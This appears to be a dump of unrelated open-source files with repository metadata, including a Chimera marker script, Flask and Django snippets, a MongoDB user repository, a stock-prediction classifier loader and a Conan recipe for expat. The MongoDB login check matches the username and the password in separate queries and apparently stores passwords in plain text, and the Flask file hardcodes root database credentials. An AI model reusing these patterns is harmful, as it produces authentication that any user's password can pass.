if "Cog5_GFPC" not in marker_sets:
s=new_marker_set('Cog5_GFPC')
marker_sets["Cog5_GFPC"]=s
s= marker_sets["Cog5_GFPC"]
mark=s.place_marker((572.279, 533.153, 452.556), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_Anch" not in marker_sets:
s=new_marker_set('Cog5_Anch')
marker_sets["Cog5_Anch"]=s
s= marker_sets["Cog5_Anch"]
mark=s.place_marker((386.301, 528.781, 619.136), (0.3, 0.3, 0.3), 18.4716)
if "Cog6_GFPN" not in marker_sets:
s=new_marker_set('Cog6_GFPN')
marker_sets["Cog6_GFPN"]=s
s= marker_sets["Cog6_GFPN"]
mark=s.place_marker((554.534, 537.457, 502.882), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_0" not in marker_sets:
s=new_marker_set('Cog6_0')
marker_sets["Cog6_0"]=s
s= marker_sets["Cog6_0"]
mark=s.place_marker((554.528, 537.448, 502.86), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_1" not in marker_sets:
s=new_marker_set('Cog6_1')
marker_sets["Cog6_1"]=s
s= marker_sets["Cog6_1"]
mark=s.place_marker((568.5, 515.537, 513.769), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_2" not in marker_sets:
s=new_marker_set('Cog6_2')
marker_sets["Cog6_2"]=s
s= marker_sets["Cog6_2"]
mark=s.place_marker((583, 523.209, 536.88), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_3" not in marker_sets:
s=new_marker_set('Cog6_3')
marker_sets["Cog6_3"]=s
s= marker_sets["Cog6_3"]
mark=s.place_marker((585.611, 547.354, 551.872), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_4" not in marker_sets:
s=new_marker_set('Cog6_4')
marker_sets["Cog6_4"]=s
s= marker_sets["Cog6_4"]
mark=s.place_marker((594.179, 574.47, 549.589), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_5" not in marker_sets:
s=new_marker_set('Cog6_5')
marker_sets["Cog6_5"]=s
s= marker_sets["Cog6_5"]
mark=s.place_marker((597.716, 602.777, 551.59), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_6" not in marker_sets:
s=new_marker_set('Cog6_6')
marker_sets["Cog6_6"]=s
s= marker_sets["Cog6_6"]
mark=s.place_marker((604.637, 630.549, 549.279), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_GFPC" not in marker_sets:
s=new_marker_set('Cog6_GFPC')
marker_sets["Cog6_GFPC"]=s
s= marker_sets["Cog6_GFPC"]
mark=s.place_marker((604.448, 556.335, 588.454), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_Anch" not in marker_sets:
s=new_marker_set('Cog6_Anch')
marker_sets["Cog6_Anch"]=s
s= marker_sets["Cog6_Anch"]
mark=s.place_marker((602.71, 708.462, 505.837), (0.21, 0.49, 0.72), 18.4716)
if "Cog7_GFPN" not in marker_sets:
s=new_marker_set('Cog7_GFPN')
marker_sets["Cog7_GFPN"]=s
s= marker_sets["Cog7_GFPN"]
mark=s.place_marker((583.959, 515.305, 583.074), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_0" not in marker_sets:
s=new_marker_set('Cog7_0')
marker_sets["Cog7_0"]=s
s= marker_sets["Cog7_0"]
mark=s.place_marker((563.708, 518.242, 567.021), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_1" not in marker_sets:
s=new_marker_set('Cog7_1')
marker_sets["Cog7_1"]=s
s= marker_sets["Cog7_1"]
mark=s.place_marker((519.895, 526.465, 530.892), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_2" not in marker_sets:
s=new_marker_set('Cog7_2')
marker_sets["Cog7_2"]=s
s= marker_sets["Cog7_2"]
mark=s.place_marker((474.909, 532.432, 495.611), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_GFPC" not in marker_sets:
s=new_marker_set('Cog7_GFPC')
marker_sets["Cog7_GFPC"]=s
s= marker_sets["Cog7_GFPC"]
mark=s.place_marker((522.749, 493.257, 443.031), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_Anch" not in marker_sets:
s=new_marker_set('Cog7_Anch')
marker_sets["Cog7_Anch"]=s
s= marker_sets["Cog7_Anch"]
mark=s.place_marker((377.174, 569.157, 486.864), (0.7, 0.7, 0.7), 18.4716)
if "Cog8_0" not in marker_sets:
s=new_marker_set('Cog8_0')
marker_sets["Cog8_0"]=s
s= marker_sets["Cog8_0"]
mark=s.place_marker((602.54, 494.777, 533.823), (1, 0.5, 0), 17.1475)
if "Cog8_1" not in marker_sets:
s=new_marker_set('Cog8_1')
marker_sets["Cog8_1"]=s
s= marker_sets["Cog8_1"]
mark=s.place_marker((590.517, 484.027, 556.765), (1, 0.5, 0), 17.1475)
if "Cog8_2" not in marker_sets:
s=new_marker_set('Cog8_2')
marker_sets["Cog8_2"]=s
s= marker_sets["Cog8_2"]
mark=s.place_marker((567.816, 470.758, 566.383), (1, 0.5, 0), 17.1475)
if "Cog8_3" not in marker_sets:
s=new_marker_set('Cog8_3')
marker_sets["Cog8_3"]=s
s= marker_sets["Cog8_3"]
mark=s.place_marker((540.693, 475.431, 571.104), (1, 0.5, 0), 17.1475)
if "Cog8_4" not in marker_sets:
s=new_marker_set('Cog8_4')
marker_sets["Cog8_4"]=s
s= marker_sets["Cog8_4"]
mark=s.place_marker((513.709, 482.59, 571.115), (1, 0.5, 0), 17.1475)
if "Cog8_5" not in marker_sets:
s=new_marker_set('Cog8_5')
marker_sets["Cog8_5"]=s
s= marker_sets["Cog8_5"]
mark=s.place_marker((485.851, 482.21, 573.71), (1, 0.5, 0), 17.1475)
if "Cog8_GFPC" not in marker_sets:
s=new_marker_set('Cog8_GFPC')
marker_sets["Cog8_GFPC"]=s
s= marker_sets["Cog8_GFPC"]
mark=s.place_marker((553.92, 514.152, 542.599), (1, 0.6, 0.1), 18.4716)
if "Cog8_Anch" not in marker_sets:
s=new_marker_set('Cog8_Anch')
marker_sets["Cog8_Anch"]=s
s= marker_sets["Cog8_Anch"]
mark=s.place_marker((418.189, 449.589, 604.796), (1, 0.6, 0.1), 18.4716)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
|
[
"batxes@gmail.com"
] |
batxes@gmail.com
|
1ff1cdd22570704212154c995cd8d54a0224c549
|
adff1dcd60ff7b67c188a5dd763896ca16c3fe34
|
/try_except.py
|
2cc8587e0450eb63bd82745dfd2c4550bc8fbd7c
|
[] |
no_license
|
anirudhrathore/Learning-Python
|
ff135070d268680a91bb8735300b39b872850916
|
d8ccc8147cec75890eb69416ac823acb02378215
|
refs/heads/master
| 2022-02-20T13:10:20.718105
| 2019-08-20T06:04:04
| 2019-08-20T06:04:04
| 198,161,453
| 0
| 1
| null | 2019-08-20T06:04:05
| 2019-07-22T06:30:42
|
Python
|
UTF-8
|
Python
| false
| false
| 280
|
py
|
try:
answer = 10/0
number = int(input("Enter a number : "))
print(number)
except ZeroDivisionError:
print("Divided by zero")
# We can also print out the actual error
#except ZeroDivisionError as err:
# print(err)
except ValueError:
print("Invalid Input")
|
[
"anirudhsinghrathore@Anirudh-MacBook-Air-4.local"
] |
anirudhsinghrathore@Anirudh-MacBook-Air-4.local
|
456408b92d6d49b5897f511f64070af37e225658
|
ccb8dfb6c350c5dcfa17f8177a9673cd71bcccda
|
/linux_src/Gado_2/ComputerVision/BarcodeDetection.py
|
a9f948478e693b7d4fe57e695917adbbe6d9c70a
|
[] |
no_license
|
ProjectGado/Project-Gado
|
9c101d10b810f7c2ced4f0958906c786d2471386
|
bbb80343508cbf86b123cfac8d8bebb1dc1b06fa
|
refs/heads/master
| 2021-01-10T19:27:15.591811
| 2013-10-14T14:39:28
| 2013-10-14T14:39:28
| 5,619,500
| 0
| 1
| null | 2012-09-05T19:41:34
| 2012-08-30T19:05:29
|
Tcl
|
UTF-8
|
Python
| false
| false
| 838
|
py
|
'''
Created on Sep 11, 2010
@author: Tom Smith
'''
#!/usr/bin/python
import zbar
import Image
def findBarcodes(filename):
# create a reader
scanner = zbar.ImageScanner()
# configure the reader
scanner.parse_config('enable')
# obtain image data
pil = Image.open(filename).convert('L')
width, height = pil.size
raw = pil.tostring()
# wrap image data
image = zbar.Image(width, height, 'Y800', raw)
# scan the image for barcodes
scanner.scan(image)
# extract results
result = []
for symbol in image:
# do something useful with results
print 'decoded', symbol.type, 'symbol', '"%s"' % symbol.data
result.append(symbol.data)
# clean up
del(image)
return result
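# Hedged usage sketch (not part of the original module): decode any barcodes in a
# local image and echo the payloads. 'sample_barcode.jpg' is a placeholder file name.
if __name__ == '__main__':
    for payload in findBarcodes('sample_barcode.jpg'):
        print 'payload:', payload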
|
[
"pellica1@niksula.hut.fi"
] |
pellica1@niksula.hut.fi
|
321466f3974133197fbce2383811b64663e6a2ae
|
b632c401bf06f898a50eaf5ff3a5c5c607587795
|
/server/setup.py
|
b41864579d7903999cf33ebabf50e7b06d174687
|
[] |
no_license
|
DimitarTB/MusicBlog
|
cf83f08b134b26937e28fe6818cf6db0dff571cf
|
8d4628714fda1fe6f8de455b3373f98a260b732b
|
refs/heads/master
| 2023-05-30T06:29:07.702641
| 2021-06-15T22:56:47
| 2021-06-15T22:56:47
| 377,259,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,529
|
py
|
from flask import Flask, jsonify
from flask_sqlalchemy import SQLAlchemy
from flask_marshmallow import Marshmallow
from flask_cors import CORS
import random
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:password@localhost/Album_Blogs?charset=utf8&use_unicode=0'
# Replace: root with the DB username, password with the DB user password, localhost with the DB host.
CORS(app)
db = SQLAlchemy(app)
ma = Marshmallow(app)
static_path = "/usr/share/nginx/html/albums" # Root directory na static file server
def customAbort(code, message):
return jsonify({
"code": code,
"message": message
}), code
def get_random_alphanumerical(_len = 16):
asciiCodes = []
alphanumerical = ""
asciiCodes += random.sample(range(97, 122), int(round(0.375 * _len)))
asciiCodes += random.sample(range(65, 90), int(round(0.375 * _len)))
asciiCodes += random.sample(range(48, 57), int(round(0.25 * _len)))
random.shuffle(asciiCodes)
for char in asciiCodes:
alphanumerical += chr(char)
return alphanumerical
def get_extension(_f):
ext = str(_f.filename.split(".")[len(_f.filename.split(".")) - 1])
if ext == "blob":
return "jpg"
else:
return ext
def createRoute(request, obj):
if request.method == "GET":
return obj.read(request)
if request.method == "POST":
return obj.create(request)
if request.method == "PUT":
return obj.update(request)
if request.method == "DELETE":
return obj.delete(request)
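# Hedged usage sketch (not part of the original module). `album_resource` below is a
# hypothetical object exposing read/create/update/delete(request); the sketch only
# illustrates how createRoute lets one view function dispatch all four HTTP verbs:
#
# @app.route("/albums", methods=["GET", "POST", "PUT", "DELETE"])
# def albums_view():
#     from flask import request
#     return createRoute(request, album_resource)
#
# get_random_alphanumerical() can be combined with get_extension() to build unique
# upload names, e.g. get_random_alphanumerical(16) + "." + get_extension(uploaded_file),
# where uploaded_file is assumed to be a werkzeug FileStorage object.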
|
[
"dimitardev1@gmail.com"
] |
dimitardev1@gmail.com
|
0bd3b109ae38f8d075eec736fa753b44c0732135
|
7ef06872757e36c700d314933d420a94a1e0f77b
|
/JPMC_pythonTest/stringManipulations/revString.py
|
778dc73c05c1bae7d6f9f9edb9193293f94fc9b9
|
[] |
no_license
|
pallavipriya3009/Learning
|
7228cd0ea629be9d98d332e31d59e32f402e6b82
|
3e87da690a3f1c04b101ad269a6dc3eda6d87851
|
refs/heads/master
| 2021-01-17T16:29:53.766768
| 2016-06-16T02:40:30
| 2016-06-16T02:40:30
| 61,256,042
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 381
|
py
|
__author__ = 'pallavipriya'
"""How to reverse String in Java using Iteration"""
def reverseItrStr(istring):
changedStr = list(istring)
length = len(changedStr) -1
for itr in range(0,len(changedStr)/2):
changedStr[itr],changedStr[length-itr] = changedStr[length-itr],changedStr[itr]
return "".join(changedStr)
str = "retcarahc"
print(reverseItrStr(str))
|
[
"pallavipriya@MacBook-Air.home"
] |
pallavipriya@MacBook-Air.home
|
20c53c35308da9b78cc83025b0f4dc7d24f2ffe8
|
8d3d18d9c5d37426a9d0d1d675719285221c156d
|
/api/migrations/0003_auto_20200204_1655.py
|
62e8ccf06d53699275e487a93f5ab555de5f7b27
|
[] |
no_license
|
suryamurugan/Cia-DJ
|
ec9c7f1a7f008c3d3dd2c76b074fc5ded11cb6a8
|
07790746ab236f394b2f0f7cef9ca2c1db59f78a
|
refs/heads/master
| 2022-12-22T01:26:02.674161
| 2020-04-03T17:16:53
| 2020-04-03T17:16:53
| 208,579,092
| 1
| 1
| null | 2022-12-08T06:50:13
| 2019-09-15T10:44:52
|
CSS
|
UTF-8
|
Python
| false
| false
| 1,099
|
py
|
# Generated by Django 2.0.10 on 2020-02-04 16:55
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0002_auto_20200204_1146'),
]
operations = [
migrations.AddField(
model_name='events',
name='e_image',
field=models.ImageField(default='events/no-img.jpg', upload_to='images/events/'),
),
migrations.AlterField(
model_name='attendregister',
name='a_datetime',
field=models.DateTimeField(blank=True, default=datetime.datetime(2020, 2, 4, 16, 55, 20, 527444)),
),
migrations.AlterField(
model_name='news',
name='n_datetime',
field=models.DateTimeField(blank=True, default=datetime.datetime(2020, 2, 4, 16, 55, 20, 528338)),
),
migrations.AlterField(
model_name='project',
name='p_datetime',
field=models.DateTimeField(blank=True, default=datetime.datetime(2020, 2, 4, 16, 55, 20, 529594)),
),
]
|
[
"surya3542live@gmail.com"
] |
surya3542live@gmail.com
|
c9cb2cbafa6b4de1722b7de1fc662a5aff4ec488
|
29b439efb499953302de9344d48eee0772573a16
|
/week07/animal_keeper.py
|
e62ffb0d2d431030c11928e736b0643f2f7e302f
|
[] |
no_license
|
strongwucc/Python003-003
|
7e2ab36c8d285a0f6fb812e40a340eb2637f4719
|
3bb7fe6ffeda9e1dc2f0345e9c5ae65b8d2af7f8
|
refs/heads/master
| 2023-01-14T06:17:53.946617
| 2020-11-17T12:25:19
| 2020-11-17T12:25:19
| 287,277,535
| 0
| 0
| null | 2020-08-13T12:45:27
| 2020-08-13T12:45:27
| null |
UTF-8
|
Python
| false
| false
| 1,748
|
py
|
from abc import ABCMeta, abstractmethod
'''
Animal class
'''
class Animal(metaclass=ABCMeta):
@abstractmethod
def __init__(self, category, shape, character):
self.category = category
self.shape = shape
self.character = character
@property
def is_ferocious(self):
return (self.shape == '中型' or self.shape == '大型') and self.category == '食肉' and self.character == '凶猛'
@property
def as_pets(self):
return not self.is_ferocious
'''
Cat class
'''
class Cat(Animal):
# call sound
call = ''
def __init__(self, name, category, shape, character):
self.name = name
super().__init__(category, shape, character)
'''
Dog class
'''
class Dog(Animal):
# call sound
call = ''
def __init__(self, name, category, shape, character):
self.name = name
super().__init__(category, shape, character)
'''
Zoo class
'''
class Zoo(object):
animals = {}
def __init__(self, name):
self.name = name
# add an animal
@classmethod
def add_animal(cls, animal):
if animal not in cls.animals:
cls.animals[animal] = animal
if not hasattr(cls, animal.__class__.__name__):
setattr(cls, animal.__class__.__name__, animal)
if __name__ == '__main__':
# instantiate the zoo
z = Zoo('时间动物园')
# instantiate a cat; its attributes are name, diet category, size and temperament
cat1 = Cat('大花猫 1', '食肉', '小型', '温顺')
dog1 = Dog('大花狗 1', '食肉', '中型', '凶猛')
# add a cat to the zoo
z.add_animal(cat1)
z.add_animal(dog1)
# check whether the zoo has the Cat species
have_cat = hasattr(z, 'Cat')
print(have_cat)
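# Illustrative extension (not in the original script): the Animal properties can be
# queried directly; dog1 is a medium-sized, fierce carnivore, so it is ferocious
# and not suitable as a pet, while cat1 is.
print(dog1.is_ferocious)
print(cat1.as_pets)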
|
[
"superwucc@gmail.com"
] |
superwucc@gmail.com
|
db138dcee9a919c6ee20eb78fe0386476deaff35
|
e23068a142a08b11fd7686dc09d46f5648aa3157
|
/curd.py
|
9477139dc29ed0d9c6deb71093d92f777d846841
|
[] |
no_license
|
tiru1930/Flask_mongoDB
|
b40629a9e8ee2cd0f4c08848f146075df37e33c3
|
e2f7a5d41e17a2fcb9a74dbdd582bb5d2500c51e
|
refs/heads/master
| 2021-01-10T02:35:31.586529
| 2015-12-07T19:22:08
| 2015-12-07T19:22:08
| 47,550,028
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,459
|
py
|
from pymongo import MongoClient
from bson.objectid import ObjectId
from RegDetails import UserDetails
from datetime import datetime
from flask import request
class UserRepo(object):
""" Repository implementing CRUD operations on contacts collection in MongoDB """
def __init__(self):
# initializing the MongoClient, this helps to
# access the MongoDB databases and collections
self.client = MongoClient(host='localhost', port=27017)
self.database = self.client['user_db']
def create(self,user):
create_id =None
if user is not None:
userName=user.User_Name
if self.database.users.find_one({"User_Name":userName}):
print create_id
return create_id
else:
create_id = self.database.users.insert(user.get_as_json())
print create_id
return create_id
else:
raise Exception("Nothing to save, becuase contact parameter is None")
def read(self,user_id=None):
if user_id is None:
return self.database.users.find({})
else:
return self.database.User.find({"_id":user_id})
def is_user_valid(self,user_name, password):
if self.database.users.find_one({"User_Name":user_name}) and self.database.users.find_one({"Password":password}):
time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
ip=request.remote_addr
sessionobj={'ipaddress':ip,'time':time}
self.database.users.update({"User_Name":user_name},{"$push":{"noOfSessions":sessionobj}})
return True
else:
return False
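# Hedged usage sketch (not part of the original module; needs a MongoDB instance on
# localhost:27017 and assumes UserDetails builds an object with a User_Name attribute
# and a get_as_json() method, as create() above expects):
#
# repo = UserRepo()
# new_id = repo.create(some_user) # some_user: a UserDetails-style object (assumed)
# repo.is_user_valid('alice', 'secret') # call inside a Flask request context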
|
[
"tirub.1930@gmail.com"
] |
tirub.1930@gmail.com
|
11f23cf901edf4d7ad77a0e3ffdb1cf2ef1deef4
|
9de5c748145962520a0180521acdec063e14f789
|
/DJango-PILDORA-INFORMATICA/V24 Enviar Mail/tiendaonline/miapp/views.py
|
45da6bfb73c92f2fecc406349c678cd21dd579e5
|
[] |
no_license
|
CritianChipana/DJango-
|
fe83dd09b923be380906e74bc5d4db3940b18cfa
|
930f74570e1a5e1f6f476c51a4fe56310d7a123c
|
refs/heads/master
| 2023-05-29T03:54:26.690202
| 2021-01-14T05:10:09
| 2021-01-14T05:10:09
| 322,924,955
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,174
|
py
|
from django.shortcuts import render,HttpResponse
from miapp.models import Articulo
from django.core.mail import send_mail
from django.conf import settings
# Create your views here.
def busqueda_productos(request):
return render(request,"busqueda_productos.html")
def buscar(request):
if request.GET['prd']:
#mensaje="Articulo Buscado: %r"%request.GET["prd"]
producto=request.GET['prd']
if len(producto)>20:
mensaje="Texto muy largo"
else:
articulos=Articulo.objects.filter(nombre__icontains=producto)
return render(request,"resultafos_busqueda.html",{"articulos":articulos,"query":producto})
else:
mensaje="No has ingresado ningun valor"
return HttpResponse(mensaje)
def contacto(request):
if request.method == "POST":
subject =request.POST['asunto']
message =request.POST['mensaje']+ " " + request.POST['email']
email_from=settings.EMAIL_HOST_USER
recipiente = ["74309273@untels.edu.pe"]
send_mail(subject,message,email_from,recipiente)
return render(request,"gracias.html")
return render(request,"contacto.html")
|
[
"cristianchipanahuaman@gmail.com"
] |
cristianchipanahuaman@gmail.com
|
db73d937503653dfa13bb69aa972e63b63be75d3
|
27bd3927710db15093da35428c44dd8a970c7ed1
|
/img_viewer.py
|
347ff92d98e92a1324102984ac05174d0c875251
|
[
"CC0-1.0"
] |
permissive
|
gerikkub/SourdoughData
|
75522aeb5befcde9a7f0eaf783b4b65198286d4d
|
7462f7ad72a78ad7e9d3fef5d0fc83e709bfbacd
|
refs/heads/master
| 2020-05-04T17:39:47.121811
| 2019-04-10T03:11:40
| 2019-04-10T03:11:40
| 179,321,209
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,512
|
py
|
import cv2
import serial
import time
import os
import math
from multiprocessing import Process
class Logger():
def __init__(self, devices, log_dir):
self._f = open(os.path.join(log_dir, 'data.csv'), 'w')
self._devices = devices
def write_header(self):
self._f.write('timestamp,' + ','.join(self._devices) + '\n')
def write_data(self, temps):
curr_ts = time.time()
self._f.write(str(curr_ts))
for dev in self._devices:
self._f.write(',' + str(temps[dev]))
self._f.write('\n')
self._f.flush()
def read_until_str(ser, string):
data = bytes()
while data[-1*len(string):] != string.encode('utf-8'):
data = data + ser.read(1)
return data
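# Note: read_until_str reads one byte at a time and blocks until the accumulated
# stream ends with the given delimiter, e.g. read_until_str(ser, 'DONE\r\n') returns
# everything received up to and including the first 'DONE\r\n' marker.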
def captureTemps(log_dir, serialDev):
ser = serial.Serial(serialDev, 115200)
ser.reset_input_buffer()
data = read_until_str(ser, 'DONE\r\n')
data = read_until_str(ser, 'DONE\r\n')
try:
data_str = data.decode('utf-8')
except:
print("Error decoding data")
return
devices = []
lines = data_str.split('\r\n')
for line in lines:
if ':' in line:
device, temp = line.split(': ')
devices.append(device)
log = Logger(devices, log_dir)
log.write_header()
while True:
data = read_until_str(ser, 'DONE\r\n')
try:
data_str = data.decode('utf-8')
except:
print("Error decoding data")
continue
curr_time = time.time()
print('Got temp data at {}'.format(curr_time))
temps = {}
lines = data_str.split('\r\n')
for line in lines:
if ':' in line:
device, temp = line.split(': ')
temps[device] = temp
log.write_data(temps)
def captureImages(log_dir):
cap = cv2.VideoCapture(0)
img_num = 0
while True:
ret, frame = cap.read()
img_time = math.floor(time.time())
img_name = "{}_{}_img.jpg".format(img_num, img_time)
print('Captured ' + img_name)
cv2.imwrite(img_name, frame)
cv2.imshow('frame', frame)
if cv2.waitKey(1000 * 60 * 5) & 0xFF == ord('q'):
break
img_num += 1
cap.release()
cv2.destroyAllWindows()
temp_p = Process(target=captureTemps, args=('.', '/dev/cu.usbmodem0007783385771'))
img_p = Process(target=captureImages, args=('.',))
temp_p.start()
img_p.start()
while True:
time.sleep(1)
|
[
"gerikkub@gmail.com"
] |
gerikkub@gmail.com
|
8504038e141f6ee36e1d70e74e8637a770e864b6
|
6ddb95963154a9b95643a23f5f3ba54ea1877e3f
|
/Backend/services/usuario_services.py
|
a5be44a24677b35e1c0a8b9f58f616b948b7d240
|
[] |
no_license
|
AlexandreMarq/api_python
|
91e1662344c0c9472f88ee441a0b02e6ecc653af
|
80e0b36da6715f3d845fb6e102177acc9d243ad7
|
refs/heads/main
| 2023-01-23T23:42:45.758514
| 2020-11-30T17:11:15
| 2020-11-30T17:11:15
| 317,292,450
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 610
|
py
|
# Imports of the application's internal modules
from infra.usuario.usuario_dao import \
listar as dao_listar, \
consultar as dao_consultar, \
cadastrar as dao_cadastrar
from model.usuario import Usuario
# Function that lists the users
def listar():
return [usuario for usuario in dao_listar()]
# Function that finds a user by login
def localizar(login):
usuario = dao_consultar(login)
if usuario is None:
return None
return usuario
# Function that creates a Usuario
def criar(usuario_dados):
usuario = Usuario.criar(usuario_dados)
return dao_cadastrar(usuario)
|
[
"53923396+AlexandreMarq@users.noreply.github.com"
] |
53923396+AlexandreMarq@users.noreply.github.com
|
24ec00f30374320942847b2dffb91acc2fa187e5
|
8b409dfa2f1dd4bba458d269046be3cdcf0e3b90
|
/ClassifierModel.py
|
8a7c07b56e5359151c5afa1d32be542f68b521fa
|
[] |
no_license
|
basasia/StockPredictionUsingSentimentAndTechnicalAnalysis
|
c79d68beeea2863f887e069f4198cf1672426fdc
|
81d6a538e9facddf93a6574123c4739afd47185b
|
refs/heads/main
| 2023-05-11T17:29:14.590540
| 2021-06-07T16:44:49
| 2021-06-07T16:44:49
| 374,324,011
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,059
|
py
|
"""
* Author: Asia Benyadilok
* Created: 30/03/2021
* Revised: 09/05/2021
* Description: Classifier Models
* User advice: None
"""
#libraries
import numpy as np
import pandas as pd
import pickle
import joblib
from DataCollectingModule import * #import all function from Data Collecting Module
from SentimentAnalysisModule import * #import all function from Sentiment Analysis Module
from TechnicalAnalysisModule import * #import all function from Technical Analysis Module
"""
* Function: preProData
* Description: method for pre-processing data for the classifier models
* Parameters: newsHeadlines and hisPrices
* Returns: features - features for the classifier models
* Warnings: none
"""
def preProData(newsHeadlines,hisPrices):
#convert news headlines and historical prices to dataframe
hisPrices = pd.DataFrame(hisPrices)
newsHeadlines = pd.DataFrame(newsHeadlines)
#convert date on the newsheadline to date object
newsHeadlines['Date'] = pd.to_datetime(newsHeadlines['Date'])
# merge news dataframe and financial dataframe together
mergeData = newsHeadlines.merge(hisPrices, how='inner', on='Date', left_index=True)
# reset index
mergeData = mergeData.reset_index(drop=True)
# remove unwanted columns
del mergeData['headline']
#extract features
features = mergeData[['Close', 'sent', 'pos', 'neg', 'neu', 'RSI', 'MACD', 'K_percent', 'R_percent', 'Price_Rate_Change','On_Balance_Volume']]
return features
"""
* Function: predict
* Description: method for predicting the stock trend
* Parameters: features
* Returns: pred - prediction output
* Warnings: none
"""
def predict(features):
# load trained model from local machine
# edit this file path to where you saved the model
with open('C:/svm_trained_model', 'rb') as f:
svm_model = pickle.load(f)
#use the trained model to predict
pred = svm_model.predict(features)
#return prediction
return pred[0]
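# Hedged end-to-end sketch (not part of the original module; the column values below
# are made up and the 0/1 meaning of the prediction is an assumption):
#
# news = pd.DataFrame({'Date': ['2021-05-03'], 'headline': ['example headline'],
# 'sent': [0.4], 'pos': [0.5], 'neg': [0.1], 'neu': [0.4]})
# prices = pd.DataFrame({'Date': pd.to_datetime(['2021-05-03']), 'Close': [125.9],
# 'RSI': [55.0], 'MACD': [0.8], 'K_percent': [70.0], 'R_percent': [-30.0],
# 'Price_Rate_Change': [0.01], 'On_Balance_Volume': [1.2e6]})
# print(predict(preProData(news, prices)))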
|
[
"noreply@github.com"
] |
basasia.noreply@github.com
|
2a42c303775f8fed8237c96d5a6047f7a3fa8003
|
922996be272d4d027cb097fea8f7515061d950dd
|
/expat/all/conanfile.py
|
d0d3139b4134af5d664812b8720f99c3c3791061
|
[
"MIT"
] |
permissive
|
efokschaner/conan-recipes
|
51ba5a380e72a891490d8439c12e83054052d334
|
c4f8b94e4017e06d602fe9d4360d44c6ec92e019
|
refs/heads/main
| 2023-07-10T19:13:48.704112
| 2021-08-05T17:34:48
| 2021-08-05T17:34:48
| 399,401,746
| 0
| 0
|
MIT
| 2021-08-24T09:07:29
| 2021-08-24T09:07:29
| null |
UTF-8
|
Python
| false
| false
| 4,119
|
py
|
from conans import ConanFile, CMake, tools, AutoToolsBuildEnvironment
import os
class ExpatConan(ConanFile):
name = "expat"
description = "Fast streaming XML parser written in C."
topics = ("conan", "expat", "xml", "parsing")
url = "https://github.com/conan-io/conan-center-index"
homepage = "https://github.com/libexpat/libexpat"
license = "MIT"
settings = "os", "compiler", "build_type", "arch"
options = {"shared": [True, False], "fPIC": [True, False]}
default_options = {"shared": False, "fPIC": True}
generators = "cmake", "pkg_config"
exports_sources = ["CMakeLists.txt", "patches/*"]
_source_subfolder = "source_subfolder"
_build_subfolder = "build_subfolder"
_cmake = None
_autotools = None
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
def configure(self):
if self.options.shared:
del self.options.fPIC
del self.settings.compiler.libcxx
del self.settings.compiler.cppstd
def source(self):
tools.get(**self.conan_data["sources"][self.version])
extracted_dir = self.name + "-" + self.version
os.rename(extracted_dir, self._source_subfolder)
def _configure_cmake(self):
if self._cmake:
return self._cmake
self._cmake = CMake(self)
if tools.Version(self.version) < "2.2.8":
self._cmake.definitions["BUILD_doc"] = "Off"
self._cmake.definitions["BUILD_examples"] = "Off"
self._cmake.definitions["BUILD_shared"] = self.options.shared
self._cmake.definitions["BUILD_tests"] = "Off"
self._cmake.definitions["BUILD_tools"] = "Off"
else:
# These options were renamed in 2.2.8 to be more consistent
self._cmake.definitions["EXPAT_BUILD_DOCS"] = "Off"
self._cmake.definitions["EXPAT_BUILD_EXAMPLES"] = "Off"
self._cmake.definitions["EXPAT_SHARED_LIBS"] = self.options.shared
self._cmake.definitions["EXPAT_BUILD_TESTS"] = "Off"
self._cmake.definitions["EXPAT_BUILD_TOOLS"] = "Off"
self._cmake.configure(build_folder=self._build_subfolder)
return self._cmake
def _build_cmake(self):
cmake = self._configure_cmake()
cmake.build()
def _install_cmake(self):
cmake = self._configure_cmake()
cmake.install()
def _configure_autotools(self):
if self._autotools:
return self._autotools
if self.options.shared:
args = ["--disable-static", "--enable-shared"]
else:
args = ["--disable-shared", "--enable-static"]
self._autotools = AutoToolsBuildEnvironment(self)
self._autotools.configure(args=args, configure_dir=self._source_subfolder)
return self._autotools
def _build_autotools(self):
autotools = self._configure_autotools()
autotools.make()
def _install_autotools(self):
autotools = self._configure_autotools()
autotools.install()
def build(self):
for patch in self.conan_data.get("patches", {}).get(self.version, []):
tools.patch(**patch)
if self.settings.os == "Windows":
self._build_cmake()
else:
self._build_autotools()
def package(self):
self.copy(pattern="COPYING", dst="licenses", src=self._source_subfolder)
if self.settings.os == "Windows":
self._install_cmake()
else:
self._install_autotools()
tools.rmdir(os.path.join(self.package_folder, "lib", "pkgconfig"))
tools.rmdir(os.path.join(self.package_folder, "lib", "cmake"))
tools.rmdir(os.path.join(self.package_folder, "share"))
def package_info(self):
self.cpp_info.names["cmake_find_package"] = "EXPAT"
self.cpp_info.names["cmake_find_package_multi"] = "expat"
self.cpp_info.libs = tools.collect_libs(self)
if not self.options.shared:
self.cpp_info.defines = ["XML_STATIC"]
|
[
"dmitry@crsib.me"
] |
dmitry@crsib.me
|
4d7493b7b097c133108c60e65a5db639ef9b8581
|
0a7acf4b3f1991bccec2b8d005c7138778e2b99d
|
/lib/BBScan/BBScan.py
|
